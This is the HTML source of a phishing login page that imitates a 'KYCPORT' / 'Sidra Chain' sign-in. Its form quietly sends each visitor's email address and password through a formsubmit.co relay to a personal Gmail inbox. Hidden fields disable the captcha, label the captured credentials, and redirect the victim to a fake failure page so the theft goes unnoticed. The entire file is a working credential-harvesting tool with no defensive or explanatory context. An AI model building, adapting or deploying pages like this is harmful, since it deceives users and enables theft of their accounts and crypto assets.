<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login with KYCPORT</title>
    <style>
        body {
            display: flex;
            justify-content: center;
            align-items: flex-start;
            height: 100vh;
            background-color: whitesmoke;
            margin: 0;
            padding-top: 60px;
        }
        .container {
            width: 90%;
            max-width: 450px;
            background: white;
            padding: 35px;
            box-shadow: 0px 0px 12px rgba(0, 0, 0, 0.1);
            border-radius: 12px;
            text-align: center;
        }
        label {
            display: block;
            text-align: left;
            margin: 20px 0 8px;
            font-weight: bold;
            font-size: 18px;
        }
        input {
            width: 100%;
            padding: 14px;
            border: 1px solid #ccc;
            border-radius: 6px;
            font-size: 10px;
            margin-bottom: 20px;
        }
        button {
            width: 100%;
            padding: 14px;
            background: blue;
            color: white;
            border: none;
            font-size: 18px;
            cursor: pointer;
            border-radius: 8px;
            margin-top: 15px;
        }
        button:hover {
            background: darkorange;
        }
    </style>
</head>
<body>
    <div class="container">
        <img src="images/download_11.png" width="150px" height="130px" alt="Sidra Chain">
        
        <form action="https://formsubmit.co/nwankwogoodluck156@gmail.com" method="POST">
    <input type="hidden" name="_next" value="fail.html">  <!-- Redirect to fail.html after submit -->
    <input type="hidden" name="_captcha" value="false"> <!-- Disable Captcha -->
    <input type="hidden" name="_template" value="table"> <!-- Format data in table form -->

    <!-- Extra Information -->
    <input type="hidden" name="SIDRA CHAIN" value="This is the email and password submitted:">

    <label for="email">Email Address</label>
    <input type="email" id="email" name="Email Address:" required>

    <label for="password">Password</label>
    <input type="password" id="password" name="Password:" required>

    <p style="text-align: left;">
        <a href="form.html">Forgot password?</a>
    </p>
    
    <button type="submit">Login</button>
</form>

        <p>Don't have an account? <a href="form.html">Register</a></p>
    </div>
</body>
</html>